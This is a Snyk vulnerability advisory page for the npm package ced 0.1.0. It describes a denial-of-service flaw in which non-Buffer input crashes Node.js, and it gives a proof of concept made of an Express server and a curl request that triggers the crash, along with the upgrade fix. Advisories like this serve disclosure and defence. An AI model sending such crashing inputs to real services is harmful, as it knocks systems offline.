Homepage

ced@0.1.0 vulnerabilities

Detect the character encoding using Google’s compact_enc_det library

  • latest version

    2.0.0

  • latest non vulnerable version

    2.0.0

  • first published

    6 years ago

  • latest version published

    2 years ago

  • licenses detected

  • View ced package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the ced package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Denial of Service (DoS)

    ced is a Detect the character encoding using Google’s compact_enc_det library

    Affected versions of this package are vulnerable to Denial of Service (DoS). Passing data types other than Buffer causes the Node.js process to crash.

    PoC

    const express = require("express");
const bodyParser = require("body-parser");
const ced = require("ced");

const app = express();

app.use(bodyParser.raw());

app.post("/", (req, res) => {
  const encoding = ced(req.body);

  res.end(encoding);
});

app.listen(3000);

    curl --request POST --header "Content-Type: text/plain" --data foo http://localhost:3000`

    How to fix Denial of Service (DoS)?

    Upgrade ced to version 1.0.0 or higher.

    <1.0.0
    Go back to all versions of this package